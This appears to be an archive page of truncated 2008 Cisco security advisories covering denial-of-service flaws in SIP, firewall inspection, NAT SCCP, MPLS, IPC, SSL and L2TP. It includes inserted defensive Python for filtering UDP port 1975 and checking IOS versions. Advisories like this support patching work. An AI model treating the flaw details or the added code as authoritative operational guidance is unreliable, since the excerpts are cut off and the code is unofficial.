Cisco Unified CallManager version 4.x is not affected by these
vulnerabilities if it does not have any SIP trunks configured.

Details
===

Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP gateways, and
multimedia applications.

SIP is a popular signaling protocol that is used to manage voice and
video calls across IP networks such as the Internet. SIP is
responsible for handling all aspects of call setup and termination.
Voice and video are the most popular types of sessions that SIP
handles, but the protocol is flexible to accommodate for other
applications that require call setup and termination. SIP call
signaling can use UDP (port 5060), TCP (port 5060), or TLS (TCP port
5061) as the underlying transport protocol.

Two DoS vulnerabilities exist in the SIP implementation of the Cisco
Unified Communications Manager. These vulnerabilities can be
triggered while processing specific and valid SIP messages and can
lead to a reload of the main Cisco Unified Communications Manager
process. Version 4.x of Cisco Unified CallManager does not have SIP
enabled by default unless a SIP trunk is configured. Versions 5.x and
later of Cisco Unified Communications Manager have SIP enabled by
default, and it cannot be disabled.

The vulnerabilities are being tracked by the following Cisco bug IDs:

  * CSCsu38644, assigned CVE ID 

Cisco Security Advisory: Cisco IOS Software Firewall Application Inspection Control Vulnerability

2008-09-24 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco IOS Software Firewall Application
Inspection Control Vulnerability

Advisory ID: cisco-sa-20080924-iosfw

http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml

Revision 1.0

For Public Release 2008 September 24 1600 UTC (GMT)

- -

Summary
===

Cisco IOS software configured for IOS firewall Application Inspection
Control (AIC) with an HTTP application-specific policy is vulnerable
to a denial of service when processing a specific malformed HTTP
transit packet. Successful exploitation of the vulnerability may
result in a reload of the affected device.

Cisco has released free software updates that address this
vulnerability.

A mitigation for this vulnerability is available. See the
"Workarounds" section for details.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml

Note: The September 24, 2008 IOS Advisory bundled publication
includes twelve Security Advisories. Eleven of the advisories address
vulnerabilities in Cisco's IOS software, and one advisory addresses
vulnerabilities in Cisco Unified Communications Manager. Each
Advisory lists the releases that correct the vulnerability described
in the Advisory. Please reference the following software table to
find a release that fixes all published IOS software Advisories as of
September 24th, 2008:

http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml

Individual publication links are listed below:

  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml

Affected Products
=

The HTTP AIC feature was introduced in Cisco IOS Software Release
12.4(9)T. The software table in this advisory identifies the affected
releases.

Vulnerable Products
+--

Devices that are running a vulnerable version of Cisco IOS software
and configured for Cisco IOS firewall AIC for HTTP are affected.

To determine the software running on a Cisco IOS product, log in to
the device and issue the show version command-line interface (CLI)
command to display the system banner. Cisco IOS software will
identify itself as "Internetwork Operating System Software" or simply
"IOS." On the next line of output, the image name will be displayed
between parentheses, followed by "Version" and the Cisco IOS release
name. Other Cisco devices will not have the show version command, or
will give different output.

The following example shows output from a device running Cisco IOS
image 12.4(15)T2:

router#show version
Cisco IOS Software, 1841 Software (C1841-ADVSECURITYK9-M), Version
12.4(15)T2, RELEASE SOFTWARE (fc7)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 17-Jan-08 23:12 by prod_rel_team

!--- Output truncated.


Additional information on the Cisco IOS release naming conventions
can be found in the document entitled "White Paper: Cisco IOS
Reference Guide", which is available at 
http://www.cisco.com/warp/public/620/1.html

The device is vulnerable if the configuration has a Layer 7 class map
and Layer 7 policy map for HTTP deep packet inspection (DPI), and
these policies are applied to any firewall zone. To determine whether
the device is running a vulnerable configuration of Cisco IOS
firewall AIC for HTTP, log in to the device and issue the CLI command
"show policy-map type inspect zone-pair | section packet inspection".
If the output contains "Policy: http <layer7-policymap name>", the
device is vulnerable. The following example shows the response from a
vulnerable device:

Router#show policy-map type inspect zone-pair | section packet inspection

 Deep packet inspection
Policy: http layer7-policymap
1 packets, 28 bytes

Router#

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by this
vulnerability. IOS releases before 12.4(9)T are not affected by this
issue. Products confirmed not vulnerable include:

  * Cisco PIX
  * Cisco ASA
  * Cisco Firewall Services M

Cisco Security Advisory: Cisco IOS NAT Skinny Call Control Protocol Vulnerability

2008-09-24 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco IOS NAT Skinny Call Control Protocol
Vulnerability

Advisory ID: cisco-sa-20080924-sccp

http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml

Revision 1.0

For Public Release 2008 September 24 1600 UTC (GMT)

- -

Summary
===

A series of segmented Skinny Call Control Protocol (SCCP) messages
may cause a Cisco IOS device that is configured with the Network
Address Translation (NAT) SCCP Fragmentation Support feature to
reload.

Cisco has released free software updates that address this
vulnerability. A workaround that mitigates this vulnerability is
available.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml

Note: The September 24, 2008 IOS Advisory bundled publication
includes twelve Security Advisories. Eleven of the advisories address
vulnerabilities in Cisco's IOS software, and one advisory addresses
vulnerabilities in Cisco Unified Communications Manager. Each
Advisory lists the releases that correct the vulnerability described
in the Advisory. Please reference the following software table to
find a release that fixes all published IOS software Advisories as of
September 24th, 2008:

http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml

Individual publication links are listed below:

  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml

Affected Products
=

Vulnerable Products
+--

This security advisory applies to all Cisco products that run Cisco
IOS Software configured for NAT and that support the NAT SCCP
Fragmentation Support feature. This feature was first introduced in
Cisco IOS version 12.4(6)T.

To verify whether NAT is enabled on a Cisco IOS device, log in to the
device and issue the command show ip nat statistics. The following
example shows a device configured with NAT:

Router# show ip nat statistics

Total translations: 2 (0 static, 2 dynamic; 0 extended)
Outside interfaces: Serial0
Inside interfaces: Ethernet1
Hits: 135  Misses: 5
Expired translations: 2
Dynamic mappings:
-- Inside Source
access-list 1 pool mypool refcount 2
 pool mypool: netmask 255.255.255.0
start 192.168.10.1 end 192.168.10.254
type generic, total addresses 14, allocated 2 (14%), misses 0

Alternatively, you can use the show running-config | include ip nat
command to verify if NAT has been enabled on the router interfaces.

Note: With reference to NAT, the term "inside" refers to those
networks that will be translated. Inside this domain, hosts will have
addresses in one address space, while on the "outside", they will
appear to have addresses in another address space when NAT is
configured. The first address space is referred to as the local
address space and the second is referred to as the global address
space. The ip nat inside and ip nat outside interface commands must
be present on the corresponding router interfaces in order for NAT to
be enabled.

In order to determine the software that runs on a Cisco IOS product,
log in to the device and issue the show version command to display
the system banner. Cisco IOS software identifies itself as
"Internetwork Operating System Software" or simply "IOS." On the next
line of output, the image name displays between parentheses, followed
by "Version" and the Cisco IOS release name. Other Cisco devices do
not have the show version command or give different output.

The following example shows output from a device that runs an IOS
image:

router>show version
Cisco IOS Software, 7200 Software (C7200-ADVSECURITYK9-M), Version 
12.4(6)T2, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2006 by Cisco Systems, Inc.
Compiled Tue 16-May-06 16:09 by kellythw


Products Confirmed Not Vulnerable
+

Cisco IOS XR and IOS XE are not affected by this vulnerability.

Cisco IOS devices not explicitly configured for NAT are not
vulnerable.

No 

Cisco Security Advisory: Cisco IOS MPLS Forwarding Infrastructure Denial of Service Vulnerability

2008-09-24 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco IOS MPLS Forwarding Infrastructure
Denial of Service Vulnerability

Advisory ID: cisco-sa-20080924-mfi

http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml

Revision 1.0

For Public Release 2008 September 24 1600 UTC (GMT)

- -

Summary
===

Cisco IOS Software Multi Protocol Label Switching (MPLS) Forwarding
Infrastructure (MFI) is vulnerable to a Denial of Service (DoS)
attack from specially crafted packets. Only the MFI is affected by
this vulnerability. Older Label Forwarding Information Base (LFIB)
implementation, which is replaced by MFI, is not affected.

Cisco has released free software updates that address this
vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml

NOTE: The September 24, 2008 IOS Advisory bundled publication
includes twelve Security Advisories. Eleven of the advisories address
vulnerabilities in Cisco's IOS software, and one advisory addresses
vulnerabilities in Cisco Unified Communications Manager. Each
Advisory lists the releases that correct the vulnerability described
in the Advisory. Please reference the following software table to
find a release that fixes all published IOS software Advisories as of
September 24th, 2008:

http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml

Individual publication links are listed below:

  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml

Affected Products
=

Devices that run Cisco IOS software (including those that support
Cisco IOS Software Modularity) and support MFI are affected if they
are configured for MPLS.

Vulnerable Products
+--

A device that runs Cisco IOS software and supports MFI will have
mfi_ios in the output of the show subsys command. The following
example shows output from a device that supports MFI:

Router#show subsys name mfi_ios
           Class      Version
mfi_ios    Protocol   1.000.001
Router#

The following example shows output from a device that is configured
for MPLS:

Router#show mpls interface
Interface        IP          Tunnel   BGP   Static   Operational
Ethernet0/0      Yes (ldp)   No       No    No       Yes
Router#

To determine the software running on a Cisco product, log in to the
device and issue the "show version" command to display the system
banner. Cisco IOS software will identify itself as "Internetwork
Operating System Software" or simply "IOS". On the next line of
output, the image name will be displayed between parentheses,
followed by "Version" and the IOS release name. Other Cisco devices
will not have the "show version" command or will give different
output.

The following example identifies a Cisco product that is running
Cisco IOS release 12.4(11)T2:

Router#show version
Cisco IOS Software, 7200 Software (C7200-ADVSECURITYK9-M), Version 
12.4(11)T2, RELEASE SOFTWARE (fc4)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Tue 01-May-07 04:19 by prod_rel_team

 

Additional information on the Cisco IOS release naming conventions
can be found in the document entitled "White Paper: Cisco IOS
Reference Guide", which is available at 
http://www.cisco.com/warp/public/620/1.html

Products Confirmed Not Vulnerable
+

Devices running Cisco IOS software versions that do not include MFI
are not vulnerable.

Devices that are not configured for MPLS are not vulnerable.

Devices that are running Cisco IOS XR software are not vulnerable.

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details 
===

In newer versions of Cisco IOS software, a new packet forwarding
infrastructure was introduced to improve scalability and performance.
This forwarding infrastructure, called MFI, is transparent to the
user. MFI manages MPLS data structures used for forwarding and
replaces the older implementation, Label Forwarding Information Base
(LFIB). Cisco IOS MFI implementation is vulnerable to a DoS attac

Cisco Security Advisory: Cisco 10000, uBR10012, uBR7200 Series Devices IPC Vulnerability

2008-09-24 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco 10000, uBR10012, uBR7200 Series
Devices IPC Vulnerability

Advisory ID: cisco-sa-20080924-ipc

http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml

Revision 1.0

For Public Release 2008 September 24 1600 UTC (GMT)

- -

Summary
===

Cisco 10000, uBR10012 and uBR7200 series devices use a User Datagram
Protocol (UDP) based Inter-Process Communication (IPC) channel that
is externally reachable. An attacker could exploit this vulnerability
to cause a denial of service (DoS) condition on affected devices. No
other platforms are affected.

Cisco has released free software updates that address this
vulnerability. Workarounds that mitigate this vulnerability are
available.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml

Note: The September 24, 2008 IOS Advisory bundled publication
includes twelve Security Advisories. Eleven of the advisories address
vulnerabilities in Cisco's IOS software, and one advisory addresses
vulnerabilities in Cisco Unified Communications Manager. Each
Advisory lists the releases that correct the vulnerability described
in the Advisory. Please reference the following software table to
find a release that fixes all published IOS software Advisories as of
September 24th, 2008:

http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml

Individual publication links are listed below:

  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml

Affected Products
=

Cisco 10000, uBR10012 and uBR7200 series devices that are running an
affected version of Cisco IOS are affected.

Vulnerable Products
+--

Devices that are running Cisco IOS can be identified by using the
show version command. The following example shows an output taken
from a Cisco 10000 series device running Cisco IOS software release
12.2(31)SB10e:

c10k#show version | include IOS
Cisco IOS Software, 10000 Software (C10K3-P11-M), Version 12.2(31)SB10e, 
RELEASE SOFTWARE (fc1)
c10k#

The following example shows an output taken from a Cisco uBR10012
series device running Cisco IOS software release 12.3(17b)BC7:

ubr10k#show version | include IOS
IOS (tm) 10000 Software (UBR10K-K8P6U2-M), Version 12.3(17b)BC7, RELEASE 
SOFTWARE (fc1)
ubr10k#

The following example shows an output taken from a Cisco uBR7200
series device running Cisco IOS software release 12.3(21a)BC2:

ubr7200#show version | include IOS
IOS (tm) 7200 Software (UBR7200-IK9SU2-M), Version 12.3(21a)BC2, RELEASE 
SOFTWARE (fc1)
ubr7200#

Please refer to the document entitled "White Paper: Cisco IOS
Reference Guide" for additional information on the Cisco IOS release
naming conventions. This document is available at the following link:
http://www.cisco.com/warp/public/620/1.html

Any version of Cisco IOS prior to the fixed versions listed in the
Software Versions and Fixes section below is vulnerable.

Products Confirmed Not Vulnerable
+

Cisco uBR7100 series devices are not affected.

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

Cisco 10000, uBR10012 and uBR7200 series devices use a UDP-based IPC
channel. This channel uses addresses from the 127.0.0.0/8 range and
UDP port 1975. Cisco 10000, uBR10012 and uBR7200 series devices that
are running an affected version of Cisco IOS will process IPC
messages that are sent to UDP port 1975 from outside of the device.
This behavior may be exploited by an attacker to cause a reload of
the device, linecards, or both, resulting in a DoS condition.

Filtering unauthorized traffic destined to 127.0.0.0/8 or UDP port
1975 will mitigate this vulnerability.
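As an added illustration of the filtering guidance above (editor's code, not part of the advisory), the following Python flags packets that meet either condition, a destination in 127.0.0.0/8 or UDP destination port 1975, over a constructed packet sample, and renders the same two conditions as an illustrative IOS extended ACL. The ACL number and the sample addresses are assumptions.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Values named in the advisory: the IPC channel uses 127.0.0.0/8 addresses
# and UDP port 1975.
IPC_LOOPBACK_NET = ipaddress.ip_network("127.0.0.0/8")
IPC_UDP_PORT = 1975


@dataclass(frozen=True)
class Packet:
    """One packet seen arriving at the device from the network (constructed)."""
    src: str
    dst: str
    proto: str            # "udp", "tcp" or "icmp"
    dport: Optional[int]  # None for protocols without ports


def ipc_exposure_reason(pkt: Packet) -> Optional[str]:
    """Explain why an externally received packet should be filtered, or None.

    Either condition alone is enough: a 127.0.0.0/8 destination has no
    business arriving on a wire, and UDP/1975 is the IPC port itself.
    """
    reasons = []
    if ipaddress.ip_address(pkt.dst) in IPC_LOOPBACK_NET:
        reasons.append("destination in 127.0.0.0/8")
    if pkt.proto == "udp" and pkt.dport == IPC_UDP_PORT:
        reasons.append("UDP destination port 1975 (IPC)")
    return "; ".join(reasons) if reasons else None


def audit(packets: List[Packet]) -> List[Tuple[Packet, str]]:
    """Return the packets the advisory's filtering guidance would drop."""
    hits = []
    for pkt in packets:
        reason = ipc_exposure_reason(pkt)
        if reason:
            hits.append((pkt, reason))
    return hits


def filter_acl_lines(acl_number: int = 110) -> List[str]:
    """Illustrative IOS extended ACL implementing the same two conditions.

    This is the editor's rendering of the advisory's one-sentence guidance,
    not the advisory's own workaround text; the ACL number is an assumption
    and the list must be reviewed against site policy before it is applied
    inbound on externally facing interfaces.
    """
    return [
        f"access-list {acl_number} deny ip any 127.0.0.0 0.255.255.255",
        f"access-list {acl_number} deny udp any any eq {IPC_UDP_PORT}",
        f"access-list {acl_number} permit ip any any",
    ]


# Constructed sample traffic; addresses come from documentation ranges.
SAMPLE_PACKETS = [
    Packet("198.51.100.7", "203.0.113.1", "tcp", 22),    # ordinary management traffic
    Packet("198.51.100.7", "127.0.0.21", "udp", 1975),   # both conditions at once
    Packet("198.51.100.9", "203.0.113.1", "udp", 1975),  # IPC port on a routable address
    Packet("198.51.100.9", "127.0.0.5", "tcp", 80),      # loopback destination only
    Packet("198.51.100.9", "203.0.113.1", "udp", 53),    # DNS, must not be flagged
    Packet("198.51.100.9", "203.0.113.1", "icmp", None), # no port, must not be flagged
]

if __name__ == "__main__":
    for pkt, reason in audit(SAMPLE_PACKETS):
        print(f"{pkt.src} -> {pkt.dst} {pkt.proto}/{pkt.dport}: {reason}")
    print("\n".join(filter_acl_lines()))
```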

This vulnerability is documented in the Cisco Bug IDs CSCsg15342 
and CSCsh29217 and has been assigned Common Vulnerabilities and 
Exposures (CVE) ID CVE-2008-3805.

Vulnerability Scoring Details
=

Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is don

Cisco Security Advisory: Vulnerability in Cisco IOS While Processing SSL Packet

2008-09-24 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Vulnerability in Cisco IOS While Processing
SSL Packet

Advisory ID: cisco-sa-20080924-ssl

http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml

Revision 1.0

For Public Release 2008 September 24 1600 UTC (GMT)

- -

Summary
===

A Cisco IOS device may crash while processing an SSL packet. This can
happen during the termination of an SSL-based session. The offending
packet is not malformed and is normally received as part of the
packet exchange.

Cisco has released free software updates that address this
vulnerability. Aside from disabling affected services, there are no
available workarounds to mitigate an exploit of this vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml

Note: The September 24, 2008 IOS Advisory bundled publication
includes twelve Security Advisories. Eleven of the advisories address
vulnerabilities in Cisco's IOS software, and one advisory addresses
vulnerabilities in Cisco Unified Communications Manager. Each
Advisory lists the releases that correct the vulnerability described
in the Advisory. Please reference the following software table to
find a release that fixes all published IOS software Advisories as of
September 24th, 2008:

http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml

Individual publication links are listed below:

  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml

Affected Products
=

Vulnerable Products
+--

Devices running Cisco IOS and using SSL-based services are
susceptible to this vulnerability. Some of the services that utilize
SSL are:

  * HTTP server supporting SSL encryption (HTTPS)
The following example shows a device that has the standard Cisco
IOS HTTP server disabled, but the SSL-enabled Cisco IOS HTTP
server enabled:

Router#show running-config | include ip http
no ip http server
ip http secure-server
Router#

  * SSL Virtual Private Network (SSL VPN) also known as AnyConnect
VPN
The following example shows a device that has the SSL VPN feature
enabled:

Router#show running-config | include webvpn
webvpn enable
webvpn
Router#

  * Open Settlement Protocol (OSP) for Packet Telephony feature
The following example shows a device that has the OSP feature
enabled and uses HTTPS protocol that is vulnerable:

Router#show running-config | include url
url https://:443/
Router#

The Cisco IOS Bug Toolkit may not accurately reflect the affected
releases for this advisory. The affected releases are as follows:

  * 12.4(16)MR, 12.4(16)MR1, 12.4(16)MR2
  * 12.4(17)

To determine the version of the Cisco IOS software running on a Cisco
product, log in to the device and issue the show version command to
display the system banner. Cisco IOS Software will identify itself as
"Internetwork Operating System Software" or simply "IOS." On the next
line of output, the image name will be displayed between parentheses,
followed by "Version" and the IOS release name. Other Cisco devices
will not have the show version command or will give different output.

Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVSECURITYK9-M), Version 
12.4(15)T2,
   RELEASE SOFTWARE (fc7)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 17-Jan-08 23:12 by prod_rel_team

Additional information about Cisco IOS software release naming is
available at the following link: 
http://www.cisco.com/warp/public/620/1.html
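As an added example (editor's code, not part of the advisory), the following Python audits a device against this advisory: it parses the release name out of a pasted show version banner, matches it against the affected releases listed above, and looks for the three SSL-based services in a running-config excerpt. The banner for release 12.4(15)T2 is the one quoted above; the second banner and the configuration excerpt are constructed.

```python
import re
from typing import Dict, List, Optional

# Affected releases quoted from the advisory (cisco-sa-20080924-ssl).
AFFECTED_RELEASES = {"12.4(16)MR", "12.4(16)MR1", "12.4(16)MR2", "12.4(17)"}

# The banner reads "..., Version 12.4(15)T2, RELEASE SOFTWARE (fc7)". Capture
# major.minor, the parenthesised maintenance number (optionally with a rebuild
# letter such as 17b) and the train/rebuild suffix (T2, MR1, SB10e, ...).
_VERSION_RE = re.compile(r"Version\s+(\d+\.\d+\(\d+[a-z]?\)[A-Za-z0-9]*)")


def parse_ios_release(show_version_output: str) -> Optional[str]:
    """Return the IOS release name from 'show version' output, or None.

    Output that does not identify itself as Cisco IOS is rejected, since the
    advisory notes that other Cisco devices print a different banner.
    """
    if ("Internetwork Operating System Software" not in show_version_output
            and "IOS" not in show_version_output):
        return None
    # Banners pasted into tickets are often wrapped; join lines before matching.
    joined = " ".join(line.strip() for line in show_version_output.splitlines())
    match = _VERSION_RE.search(joined)
    return match.group(1) if match else None


def is_affected_release(release: Optional[str]) -> bool:
    """Exact match against the advisory's affected-release list."""
    return release in AFFECTED_RELEASES


def ssl_services_enabled(running_config: str) -> List[str]:
    """Name the SSL-based services the advisory lists that appear in the config.

    Negated commands ("no ip http server") are skipped, so a device with the
    plain HTTP server disabled but 'ip http secure-server' present still counts.
    """
    found: List[str] = []

    def add(name: str) -> None:
        if name not in found:
            found.append(name)

    for raw in running_config.splitlines():
        line = raw.strip()
        if line.startswith("no "):
            continue
        if line == "ip http secure-server":
            add("HTTPS")
        elif line.startswith("webvpn enable"):
            add("SSL VPN")
        elif line.startswith("url https://"):
            add("OSP over HTTPS")
    return found


def assess(show_version_output: str, running_config: str) -> Dict[str, object]:
    """Combine both checks: vulnerable only if the release AND a service match."""
    release = parse_ios_release(show_version_output)
    services = ssl_services_enabled(running_config)
    affected = is_affected_release(release)
    return {
        "release": release,
        "affected_release": affected,
        "ssl_services": services,
        "vulnerable": affected and bool(services),
    }


# Banner quoted from the advisory text above (release 12.4(15)T2, not affected).
PAGE_BANNER = """Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVSECURITYK9-M), Version 12.4(15)T2,
   RELEASE SOFTWARE (fc7)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 17-Jan-08 23:12 by prod_rel_team
"""

# Constructed banner for an affected release; not output from any real device.
CONSTRUCTED_BANNER = """Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVSECURITYK9-M), Version
12.4(16)MR1, RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
"""

# Constructed running-config excerpt combining the advisory's HTTPS and SSL VPN examples.
CONSTRUCTED_CONFIG = """no ip http server
ip http secure-server
webvpn enable
webvpn
"""

if __name__ == "__main__":
    for banner in (PAGE_BANNER, CONSTRUCTED_BANNER):
        print(assess(banner, CONSTRUCTED_CONFIG))
```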

Products Confirmed Not Vulnerable
+

No other Cisco products and Cisco IOS releases are currently known to
be affected by this vulnerability.

Details
===

This vulnerability is triggered during the termination of an SSL
session. Possession of valid credentials such as a username, password
or a certificate is not required. SSL protocol uses TCP as a
transport protocol. The requirement of the complete TCP 3-way
handshake reduces the proba

Cisco Security Advisory: Cisco IOS Software Layer 2 Tunneling Protocol (L2TP) Denial of Service Vulnerability

2008-09-24 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco IOS Software Layer 2 Tunneling
Protocol (L2TP) Denial of Service Vulnerability

Advisory ID: cisco-sa-20080924-l2tp

http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml

Revision 1.0

For Public Release 2008 September 24 1600 UTC (GMT)

- -

Summary
===

A vulnerability exists in the Cisco IOS software implementation of
Layer 2 Tunneling Protocol (L2TP), which affects limited Cisco IOS
software releases.

Several features enable the L2TP mgmt daemon process within Cisco IOS
software, including but not limited to Layer 2 virtual private
networks (L2VPN), Layer 2 Tunnel Protocol Version 3 (L2TPv3), Stack
Group Bidding Protocol (SGBP) and Cisco Virtual Private Dial-Up
Networks (VPDN). Once this process is enabled the device is
vulnerable.

This vulnerability will result in a reload of the device when
processing a specially crafted L2TP packet.

Cisco has released free software updates that address this
vulnerability.

Workarounds that mitigate this vulnerability are available.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml

Note:  The September 24, 2008 IOS Advisory bundled publication
includes twelve Security Advisories. Eleven of the advisories address
vulnerabilities in Cisco's IOS software, and one advisory addresses
vulnerabilities in Cisco Unified Communications Manager. Each
Advisory lists the releases that correct the vulnerability described
in the Advisory. Please reference the following software table to
find a release that fixes all published IOS software Advisories as of
September 24th, 2008:

http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml

Individual publication links are listed below:

  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml

Affected Products
=

All devices running affected versions of 12.2 or 12.4 Cisco IOS
system software and that have a vulnerable configuration are affected
by this vulnerability.

Vulnerable Products
+--

To determine if a device is vulnerable, first confirm that the device
